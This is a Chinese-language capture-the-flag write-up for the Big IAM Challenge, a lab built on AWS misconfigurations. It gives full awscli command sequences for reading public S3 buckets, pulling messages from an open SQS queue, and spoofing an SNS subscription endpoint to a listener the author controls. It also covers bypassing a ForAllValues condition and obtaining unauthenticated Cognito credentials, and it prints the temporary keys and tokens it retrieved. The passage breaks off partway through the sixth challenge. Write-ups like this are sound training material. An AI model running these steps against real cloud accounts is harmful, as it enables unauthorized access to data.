The Big IAM Challenge
1. Buckets of Fun
考点:对于存储桶应该避免允许公开访问以及避免允许公开列对象,防止敏感信息遭到泄露
给了我们一个IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
}
}
}
]
}
这个IAM策略表示,允许任何人对
thebigiamchallenge-storage-9979f4b桶中的对象执行s3:GetObject操作(读取、下载)。
还可以对桶本身执行s3:ListBucket操作
条件是:s3:prefix为"files/*"。
这里直接用 awscli 进行操作即可
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/ --no-sign-request
2023-06-05 15:13:53 37 flag1.txt
2023-06-08 15:18:24 81889 logo.png
--no-sign-request匿名访问
#下载文件
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/ --no-sign-request
download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to ../../../../../tmp/flag1.txt
┌──(root㉿kali)-[~]
└─# cat /tmp/flag1.txt
{wiz:exposed-storage-risky-as-usual}
2. ## Google Analytics
考点:对于 SQS 服务,应该避免允许公开接收队列的消息,避免在传输消息时造成敏感信息的泄露
先看IAM policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:SendMessage",
"sqs:ReceiveMessage"
],
"Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
}
]
}
这里挑战涉及一个 SQS(简单队列服务)队列,该队列的 IAM 策略允许公开发送和接收消息
该策略允许任何人对wiz-tbic-analytics-sqs-queue-ca7a1b2队列执行sqs:SendMessage和sqs:ReceiveMessage操作。
SQS
SQS (Simple Queue Service) 可以用来帮助不同的应用程序之间进行可靠的消息传递,它就像是一个消息中转站,可以把消息从一个地方发送到另一个地方,确保消息的安全送达和处理,让应用程序之间更好地进行通信和协作。
使用指定的身份池 ID 从 Amazon Cognito 检索一个身份 ID
首先需要一个指定的ID,可以在题目源代码中获取
# aws configure配置一下区域,不然会报错
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws configure
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]: us-east-1
Default output format [None]:
#获取 Cognito Identity ID
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws cognito-identity get-id --identity-pool-id "us-east-1:c6f3eb2e-3cb5-404e-93bc-f0bdf7ad042e"
{
"IdentityId": "us-east-1:157d6171-eef6-c527-06ad-914f1634e3bb"
}
然后使用这个身份ID检索临时 AWS 凭证
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/1]
└─# aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:157d6171-eef6-c527-06ad-914f1634e3bb"
{
"IdentityId": "us-east-1:157d6171-eef6-c527-06ad-914f1634e3bb",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXJC2YRA4W",
"SecretKey": "6V6TcB4Tq7uUTTW1IsjXCpxcsBqtCFvKXR5ZRE+V",
"SessionToken": "IQoJb3JpZ2luX2VjEL///////////wEaCXVzLWVhc3QtMSJHMEUCIEQO3xRYFXvznNMaSNzmHKWEcOJxrV1N5SFq/HN9VMXcAiEA9yqIpQv6uGcIFmt2IKNag0xMFQkX0lbEYrWwGoYDdD4qsAUIVxAAGgwwOTIyOTc4NTEzNzQiDCHzuDkQcgaTMom/FiqNBSmoeJlbQk5EyuzBtYWrvrqBR+0VbmtQYDOiifXhW8Cpx+J1kuUYdJ/pYmSvNIt78svdDvt36osNGbMEk1QCPYN5nB6JIgqlCEfIV1NU7MIvyWAb1CaHjFUQfCT+VmQkK8C9j/d8mnkyj4HIbvsfqFDv6d4OW0WTFIInQXAfN5AiGlWVQA9w5QIx0phmt4n8hZ63DrdC3L3Fe/+VaC6p3dV+tjMM20QNHSjlPzigAZJor9dqaUDMoa5/51e0yUQCAVOXQy26iWAO4Cy635eBLK5HAUqGoerTUWeMPVaRZDCoRl37qqJst7PsY+ite+O05is/M4DQtZ5aE1oPNg3+FiSTHVJqQPjz/+16ngAwFcMd6/xL9dTcKPRNJMpOWBdsJ5gGyZHhuLBVBnFw/d/lWCvPsVPpogZrHATzjviYbmjhbKW27rdvH6cv6elW0vcQazzZ28EtF4rAh78FeCqyIwkknnenBHPLb8bLz2Wzl9XhUuVz+EhxGsYYi2UixoR44rfbiRFb3L7AliUj+egDMIVjZvgjE7x6fGd7fv+MBco/2TP0R9JdYScpvup/V4z7EHW+eyqgPpbCHK+pwaUjH12K5ZBgupTyvc/rHPQ4Nlq6nq1rys8iqxfUYxyaa/o+jAxyzWIVtHtV3UFFZq89F8hZMYoPVoRUD+FsykPaNd0LmUjoGv0qQmAjFfk/+bMcL3sG8rznCdjsECXDryFKyFSJHkKtOOm3WnTQ6v3i2wfXQ7rhtmvc9c8xYKbx1ozlpn4GhnjnOxPjCargR1DOYCscXPgZ7zuprBaQiOrn76cyn5oobGkXrsDN3SZQxV1XzJ4SWlvbd5aQcpMNmx+7hekNgo/I+t/cVg6PbpN3MMiVt8AGOt4CvVIyjn3YfrgpC656g4ue9wtU1KFFCJEYbfssOxYMGmHPqKdEwqViFoYtNfDAqcZEg1EaLZwDwfTeIqOxO4DP2gKMS6gA5EfG9rI4CSftLt/zphnwDOC7Ok4PuyBnUshDLEdOYCkyk35vp6/H1FKgA1fZaEdpGEbKCRMyiBwjUGD6GTzskdJilZKw5Q4VRyAtGyFZzqCGMI2Ppw4d6zPJ8hqucncCsvqCs9z8Fko96ew2Ef+calW7V+BZNJgJ+S1Hceq6Tw4PYZspytZKF0JW7et1m7xG/X20l3J0jgnY6C07BmPZPOupuaGRM36gsMJXUhzZ76x+NuNhhJxVeiauvSjejK2F4koqLViKryZFTHJOI/iZjQiZoXw7H8oNYgMAbJ+LJDSR9e3+X3Z0c68CH/ofcmCyHImjeWz10CS89QuAFZjfx80RZik/PcreNqnrf4JF3jo/ESnJlGaXBJo=",
"Expiration": "2025-04-27T03:12:24-04:00"
}
}
使用 sts get-caller-identity 命令验证从 Amazon Cognito 获得的临时凭证是否有效
#导入环境变量
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# export AWS_ACCESS_KEY_ID="ASIARK7LBOHXJC2YRA4W"
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# export AWS_SECRET_ACCESS_KEY="6V6TcB4Tq7uUTTW1IsjXCpxcsBqtCFvKXR5ZRE+V"
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEL///////////wEaCXVzLWVhc3QtMSJHMEUCIEQO3xRYFXvznNMaSNzmHKWEcOJxrV1N5SFq/HN9VMXcAiEA9yqIpQv6uGcIFmt2IKNag0xMFQkX0lbEYrWwGoYDdD4qsAUIVxAAGgwwOTIyOTc4NTEzNzQiDCHzuDkQcgaTMom/FiqNBSmoeJlbQk5EyuzBtYWrvrqBR+0VbmtQYDOiifXhW8Cpx+J1kuUYdJ/pYmSvNIt78svdDvt36osNGbMEk1QCPYN5nB6JIgqlCEfIV1NU7MIvyWAb1CaHjFUQfCT+VmQkK8C9j/d8mnkyj4HIbvsfqFDv6d4OW0WTFIInQXAfN5AiGlWVQA9w5QIx0phmt4n8hZ63DrdC3L3Fe/+VaC6p3dV+tjMM20QNHSjlPzigAZJor9dqaUDMoa5/51e0yUQCAVOXQy26iWAO4Cy635eBLK5HAUqGoerTUWeMPVaRZDCoRl37qqJst7PsY+ite+O05is/M4DQtZ5aE1oPNg3+FiSTHVJqQPjz/+16ngAwFcMd6/xL9dTcKPRNJMpOWBdsJ5gGyZHhuLBVBnFw/d/lWCvPsVPpogZrHATzjviYbmjhbKW27rdvH6cv6elW0vcQazzZ28EtF4rAh78FeCqyIwkknnenBHPLb8bLz2Wzl9XhUuVz+EhxGsYYi2UixoR44rfbiRFb3L7AliUj+egDMIVjZvgjE7x6fGd7fv+MBco/2TP0R9JdYScpvup/V4z7EHW+eyqgPpbCHK+pwaUjH12K5ZBgupTyvc/rHPQ4Nlq6nq1rys8iqxfUYxyaa/o+jAxyzWIVtHtV3UFFZq89F8hZMYoPVoRUD+FsykPaNd0LmUjoGv0qQmAjFfk/+bMcL3sG8rznCdjsECXDryFKyFSJHkKtOOm3WnTQ6v3i2wfXQ7rhtmvc9c8xYKbx1ozlpn4GhnjnOxPjCargR1DOYCscXPgZ7zuprBaQiOrn76cyn5oobGkXrsDN3SZQxV1XzJ4SWlvbd5aQcpMNmx+7hekNgo/I+t/cVg6PbpN3MMiVt8AGOt4CvVIyjn3YfrgpC656g4ue9wtU1KFFCJEYbfssOxYMGmHPqKdEwqViFoYtNfDAqcZEg1EaLZwDwfTeIqOxO4DP2gKMS6gA5EfG9rI4CSftLt/zphnwDOC7Ok4PuyBnUshDLEdOYCkyk35vp6/H1FKgA1fZaEdpGEbKCRMyiBwjUGD6GTzskdJilZKw5Q4VRyAtGyFZzqCGMI2Ppw4d6zPJ8hqucncCsvqCs9z8Fko96ew2Ef+calW7V+BZNJgJ+S1Hceq6Tw4PYZspytZKF0JW7et1m7xG/X20l3J0jgnY6C07BmPZPOupuaGRM36gsMJXUhzZ76x+NuNhhJxVeiauvSjejK2F4koqLViKryZFTHJOI/iZjQiZoXw7H8oNYgMAbJ+LJDSR9e3+X3Z0c68CH/ofcmCyHImjeWz10CS89QuAFZjfx80RZik/PcreNqnrf4JF3jo/ESnJlGaXBJo="
#验证凭据是否有效
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXAC44TZDYM:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_emptyroleUnauth_Role/CognitoIdentityCredentials"
}
将带有正文 "Hello, World" 的消息发送到 SQS 队列
要调用 Receive Message 接口,需要知道 Queue URL,Queue URL 的主要构成部分就是 Account ID 和 Queue,在题目的 Policy 中给出了 Account ID 和 Queue 的值,那么我们就可以构造这个 Queue URL 了
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --message-body "Hello, World" --region us-east-1
{
"MD5OfMessageBody": "82bb413746aee42f89dea2b59614f9ef",
"MessageId": "dbb93510-8532-4c40-ad45-b77ee5c73342"
}
从队列接收消息
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --region us-east-1
{
"Messages": [
{
"MessageId": "ad06aad3-9112-4425-877f-a78ae5fe2ff7",
"ReceiptHandle": "AQEBC4n2tnfG7aGfJ0461AKqtYdZYOqAVdBkq2NdpRyn0fLA5ltFRGmXnXSzhxOmV56xkfLXehB+gbuixB/QJwOM2vxGcEkqJ+te/8hZNDq2on52JilPC5Wiz5GmqLBdsA2ChEqB6mZmbKCGm2+rDnlzpvQ43GzbypQrD/wWJmdtyJfMce9PE5AqfQGZzp19b+rPqqHDX56HAdvjWoAcmev+fcWzzw4q5UQtSmPJ2pPOhwJz4ZgmXoTkZrbjVXjTmmxUerQYHDa1CMgT6c2UKtahkZEiHuWz08VrYSqz/+GEeRy5eK0/UF285PzaKWg6jQ9ytG1SYL7imlEIZ/2zro30jHbaug27dxllcXMaSx9ODx2Nrd+V1RwnsYTDrgW96h+QYoRimzy1eFsrupcgODQRFrefdDFLXwgUlzB82RVOoso=",
"MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
"Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}"
}
]
}
然后就有一个url,访问即可获取到flag
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
3. Enable Push Notifications
先看policy
{
"Version": "2008-10-17",
"Id": "Statement1",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Condition": {
"StringLike": {
"sns:Endpoint": "*@tbic.wiz.io"
}
}
}
]
}
这个 Policy 允许 Endpoint 结尾是
@tbic.wiz.io的人拥有这个 SNS 服务的 Subscribe 权限。
Amazon SNS:https://docs.aws.amazon.com/zh_cn/sns/latest/dg/welcome.htmlhttps://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/subscribe.html
这里支持http协议,那么就可以使用http://RHOST:RPORT/@tbic.wiz.io进行伪造
SNS
SNS(Simple Notification Service)可以帮助开发人员向移动设备、电子邮件、消息队列等多种终端发送通知消息,让你能够轻松地向用户传递重要信息和实时更新。简单来说,SNS 就像是一个消息广播系统,让你能够快速、可靠地将消息发送给订阅者,确保他们及时收到你发送的通知。
首先在自己服务器上开启监听
#VPS
root@hcss-ecs-0abd:~# nc -lvk 1122
Listening on [0.0.0.0] (family 0, port 1122)
然后进行订阅
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sns subscribe --protocol http --notification-endpoint https://c1trus.requestcatcher.com/test@tbic.wiz.io --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
{
"SubscriptionArn": "pending confirmation"
}
然后就可以收到订阅的请求了,但是需要进行验证,需要用到请求中的token
root@hcss-ecs-0abd:~# nc -lvnp 1122
Listening on [0.0.0.0] (family 0, port 1122)
Connection from 15.221.161.116 59239 received!
POST /@tbic.wiz.io HTTP/1.1
x-amz-sns-message-type: SubscriptionConfirmation
x-amz-sns-message-id: a26e650f-67f2-44cf-95e1-a57e1ac6a721
x-amz-sns-topic-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
Content-Type: text/plain; charset=UTF-8
Content-Length: 1623
Host: 124.71.111.64:1122
Connection: Keep-Alive
User-Agent: Amazon Simple Notification Service Agent
Accept-Encoding: gzip,deflate
{
"Type" : "SubscriptionConfirmation",
"MessageId" : "a26e650f-67f2-44cf-95e1-a57e1ac6a721",
"Token" : "2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852",
"TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message" : "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
"SubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852",
"Timestamp" : "2025-04-27T06:47:26.486Z",
"SignatureVersion" : "1",
"Signature" : "RRsUF5y0bE+5iKE+oRN5OwwPnDZwM6TGOr+KP4Q6NKOw/uxQB5QdSlikBVjSBUMOQwZn6TCtnVHQbKkPUkNR4vulrOMegqPGbJbiDliTDRDy7tUDlA++zhLAHAkAU4t8Lx9Cy++Kx1aH2DyHMI9qdi2VMV7n2PrGbEc6zNHjctOwbV4+xaf77dDK/yYtG6BedGI0eJgMpw0HcD+72SSgfjhL/Nj0DtckFd3izigfwzZZwqm0hMYb96Bil1xllbVgLtYnZiCd9WHP7IkwVzsl/c0Ff/oqlBylbmqSgPC4udsChjge8/B7Qo6ibPs/ywT0c5IUYOJIfmUopNAD/4IDrA==",
"SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-9c6465fa7f48f5cacd23014631ec1136.pem"
}
进行订阅后还需要确认,可以点击SubscribeURL通过URL确认订阅消息,也可以通过confirm-subscriptio接口传token
#进行确认操作
aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852
aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425a8a5874c1b184794c3b4f666ea5258862586f9732a948ea61de9757e7add9434114379693dcf9059cb97f538e19a94d994dd51c9d56abe31eb90d2e86b20ae86905eadd118d4160c33efe2f7fff848d185cc189292b3b1ae043bbd6cde25d1e5408b6cb2914e69ccaa7a73583ae36b7e13852
这里我失败了。
我采取了另外一种方式。我在网站找了一个请求捕获器
Request Catcher — record HTTP requests, webhooks, API calls
#订阅请求
aws sns subscribe --protocol https --notification-endpoint https://c1trus.requestcatcher.com/test@tbic.wiz.io --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications
然后打开订阅的URL 确认请求
然后就会收到回信
4. Admin only?
先看策略
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
},
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
}
}
}
]
}
- 允许任何人对
thebigiamchallenge-admin-storage-abf1321/桶中的对象执行s3:GetObject- 允许对
thebigiamchallenge-admin-storage-abf1321这个桶本身执行s3:ListBucket但要求前缀为files且用户 ARN 为arn:aws:iam::133713371337:user/admin
> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43 42 flag-as-admin.txt
2023-06-08 19:20:01 81889 logo-admin.png> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
> curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}
总结
漏洞原因:
对于 ForAllValues,如果请求中没有键或者键值解析为空数据集(如空字符串),则也会返回 true,不要使用带有 Allow 效果的 ForAllValues,因为这样可能会过于宽容。
也就是说,如果我们把请求中的 aws:PrincipalArn 值为空,这里就会返回 True,那么就可以绕过了
解决方法:
只要把 ForAllValues 替换成 ForAnyValue 就行了,如果键值是空值的话,ForAnyValue 会返回 False,而不是 True,此时我们如果是未授权的访问就会提示 AccessDenied 了
5. Do I know you?
本题的策略
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"mobileanalytics:PutEvents",
"cognito-sync:*"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::wiz-privatefiles",
"arn:aws:s3:::wiz-privatefiles/*"
]
}
]
}
此 IAM 策略允许应用程序发送事件数据,并允许在 Cognito Sync 服务中执行所有操作。它还允许从桶 wiz-privatefiles 下载和列出对象
从策略中我们知道他们正在使用 Cognito 服务,所以让我们先尝试找到身份池 ID
还是从网页源码中获取到身份池的ID
us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
然后利用这个身份池ID获取一个 Cognito Identity ID
> aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
"IdentityId": "us-east-1:157d6171-ee79-cab7-3487-9e6ead530042"
}
然后用这个身份获取一个临时凭证
> aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:157d6171-ee79-cab7-3487-9e6ead530042"
{
"IdentityId": "us-east-1:157d6171-ee9f-c168-6284-09e6aebdf217",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXLRGKSR5G",
"SecretKey": "pciPuW6DVSCBLusK78eSwSozf7zEqxIZkrTiSqz0",
"SessionToken": "IQoJb3JpZ2luX2VjEMX//////////wEaCXVzLWVhc3QtMSJGMEQCIF7ApIhvlHEZ2HMgsiO8sjcvCp7f3EkD1+YMmoKu+z1XAiB+6JkwOXrho0nDoAA0Drg+F27GS8UJEn5iyPsjicf2hiqwBQheEAAaDDA5MjI5Nzg1
MTM3NCIMl6eVm1cKk5PPuatHKo0FHAfP1DvhHW1kKx0Nlm+9+41XxJrqtvHhldd8eB8ZzwYVBAZ7WiAjENIbixtLUGuz2NhHnZSaAHdGO5fWNPLXvIISzlqCXZSknfKmOKL1oZqkwUEw0JbW1ckn1mX7/kDf9GyuZ521ATOa3TnVU2OzpOBPBdtNfDl7i
snBknFQx3hkdpgJxtgRB8BiHfpIZrwbYPsftAoKwvK6w/0dtN5nXWAW5cYXqZsar2P7qfI7DLXPtGynyg8ZBxs5U0CQ+pi9I5b/gxc+07yvUo9K0PonaqH5c9NcX4gD5JTsCy0vAjYDf1uZC9FLq4qJ2c1j2KuSHNgM9m4xVHuiN7YgWCOj7V+2+5zNcT
Aq7J9o0t7BOMgp2qDzd6v8P2X9yvEZ1e/JfXKPacvbH3IbAiDBYTZVMa/Tt6yZ47Jeenmp9UCzkYLPRbwjcPSw8+Vxhw25kRe+ieZTb+KPvkluHEcxyjGLTh/tmmvnaFZHAL/SsuC31qXd7m4qU2AxR6MwcvjzihbO8jiKOWCPraAeph7rehNpdF6r2CT
oundo0QXk6CXeKeP/zJ+4tYLtYe8+xtD9Jo9jRrGMFFKI+AtrFQIOBz/aDC61NhdEokeMDnh+mJWpgg5fpnlmjbSVf7+Enxvzmc2DavsvaSWvaowOZMZe5yxTeNMFA0dcf9ZWOPP9kbAB2tohMsdyMPfJCRftUt50w8jzdtOsyGN3oiyEY7GdQzJQE//K
1dUS+HRrZPxnD5BtZ5qs4Wi97Db8D4pxDWmPC8Rwv/lCc3MTBY7Xh54kXJrSzMUPOW9PlLvY2UyT6FOJFyyI7gRw44agg0mP+yLWvq13KGKJE9QKCyX0h/fBPZ2UpxlwWL6Be0M5TFPQdM0w7ci4wAY63wITtkg+tYsvqHvxMJHAX5kBMQBCTH82hEJYC
qN37qC9QtIFSYmd67nwxWvHhdPnFC7e9D7AufORFE+O69n3M+c0S2lxFSc4mxft/g4ilx5Pd1nUAFII+kyGWvXUaU1OH2MGJzEwGsLwmKXAk8Y30otE9CCWL16lVoM2syrXvbd5KPJup51UsNcmklTwUOHTL5T8kkMRKZrKzwf/FwFmCF3iMt66BPYouZ
WmvcEKaMuAMcCozQNA8efu9/hjf8dq8rHWVzNwzFfunp3fppB0MFsFiWfwTaShcA7WeqWf3lyeWGvSuAHl24zB9wKzVFTI5jrxg/0AAUjnUz9A7m7pwgjckrEMDiNBZX+KMf+5BreFekRXBaOSjfuw/WqoSq1Z3r5r+RdQxA1JOOm7+BAzZELhXcLNrQ1
Pu8jtTup0By37Fs43sYIXG3GRT+0dL3OiTS6Iytd45QQX2SKMKIkEZpU=",
"Expiration": 1745760893.0
}
}
然后进行配置
export AWS_ACCESS_KEY_ID="ASIARK7LBOHXCRFQHMUU"
export AWS_SECRET_ACCESS_KEY="dM3qXdsIeUl0v2f803ufHAlzcZZJcrLfs4kMt8Oa"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEMX//////////wEaCXVzLWVhc3QtMSJIMEYCIQCxcNnyfepPe/ZlXHDl0v9u3ucnvYsuVscOfgXhaOPBwAIhAMrb8Y75LNEkwOZWlnfZzZ6A4rFNtXleAoAGQmtc7etcKrAFCF4QABoMMDkyMjk3ODUxMzc0IgyeXxXTkzPBeLk84t8qjQV9l7QHgwB+kVndTWFIHH0+BsIm7+5AmhvzypPMfhOGUABumZHu5XQzIwQTBkyTL1QLF7Lj2YsVJ43PfjhcGMkTDZxDO0XfwdH3z7t/j2e71yz6qlNe2uIVj2Estf2QvffetlXbFUoy2EX7dQ3p7HDjHjzz1wVCdaSWvj92vcCFDgp9wjIwffw22PillcdkCGL99XlnUYSAGpO4bkpd8Mmb5tjRAROrjg51kBryTy6x0TajRlvZV3GsMGx7DfCBO1XU1smjmCMBuwmNWnYIgQ/9GHBAspHrj/oNOs426oYW/jf1Z0UhY2p3I16Quw3XSIVcsuWWLDWhBWlPQl6loSlC9B4y7K3X9z9kcr/J9SBa/oRaWBr/5eI97PfK20g6kOor+Fzuxsx58l4oIXTer5UbrO7UR5sPR25VQfbziugcxYGPybLZAHxqiblCZMXwDls7cVUJCY23T9IlOKp5m+LOlKjm0vDN4awIUut37/ND2g9wTPtKMGGZfVOjRGf5bw46j2G6Qw4xxrVDjy6YyitwFZmSTqm2GZLTRjdafiEC1FLJmj/oxYLY+o3Z9YJrcXwKHST1BKg3ouLdX7ItSdNrljARXyntNHKlZdNiddO7+oE4cHcdQJjMI42uLCP+GabjjMj2I3nixLz/007FEf+q69l4yRmEm5ogfMMF3irFAITabi0jkPvo8VtFtgmXk5Op55nQ99e/I6T6Dl+1WTrGdCBMymPj/J9tMqNJ4g9YDpQsIP0JglyHH3cUojXsJ2cvzRqGXZW4T5lt59ssMyErIyfM1U47ocGMUZpxX+pza822uA/eBRAdR3qKyEisbeQNNzjEvLGjJPn1fv519mUNod5d/zmYuqeo5NkkPjDjzbjABjrdAgn4WG2ACByfyhJoWOMYEWF3H6trlRLw9YjgFcsMa5hF0YtPn7Ae1o6RaFYKAHIBQUDuLvueR7tN61IsgPiFtM2pQnJHdYn7IoxTeA0B2gm4Q7a8nvfkhtp0b/CILI0xgi1k72BsfFygXKerHO9NeD3HK54KaM/xADEQEov2SDp/lMbS9EMjZ+lHT1kf4QIpdjUyQZaYGPNfAMUPRHxiVnwhqZAmy5/z/gbAAerAtGyINiP3NncAHv9jiIQt/TBO/3PWLW5Htgb6bd+k/pu2s4Ii3xIbHBKNF/i8EGoaP3AFL9XlA+6ph31Mjs9dotBOM4fizTNpf0Ha6OY06kuRwlCWHSxxY9Zvbl2MKkPMuwkgx7zOXxp0OG5GZdJIa+KLcu/aB/TF3jcxLOQ/AXhkd02WtZKtqTMCJw/4x5EjQ7KXJ7148KurFnc4DIQ5E6T2pYe77/mp/wzbGZiICec="
#验证是否有效
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
#返回这个就是有效
然后我们就有权限进行 "s3:GetObject", "s3:ListBucket" 操作了
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws s3 ls s3://wiz-privatefiles
2023-06-05 15:42:27 4220 cognito1.png
2023-06-05 09:28:35 37 flag1.txt
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# cat /tmp/flag1.txt
{wiz:incognito-is-always-suspicious}
6. One final push
策略
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
这个策略允许身份 us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b 进行 sts:AssumeRoleWithWebIdentity,这里给了我们身份池ID
这里的考点就是利用 AssumeRoleWithWebIdentity 生成 STS
生成STS需要三个东西
> aws sts assume-role-with-web-identity help
--role-arn <value>
--role-session-name <value>
--web-identity-token <value>
这里面的 --role-arn 题目给我们了。--role-session-name 随便取一个、--web-identity-token 需要我们自己获取
这里用到了cognito,那我们还是老样子。
#利用身份池ID获取 identityID
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
"IdentityId": "us-east-1:157d6171-eecb-c249-fad8-a66176f64be4"
}
#利用IdentityId 获取TOKEN
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eecb-c249-fad8-a66176f64be4
{
"IdentityId": "us-east-1:157d6171-eecb-c249-fad8-a66176f64be4",
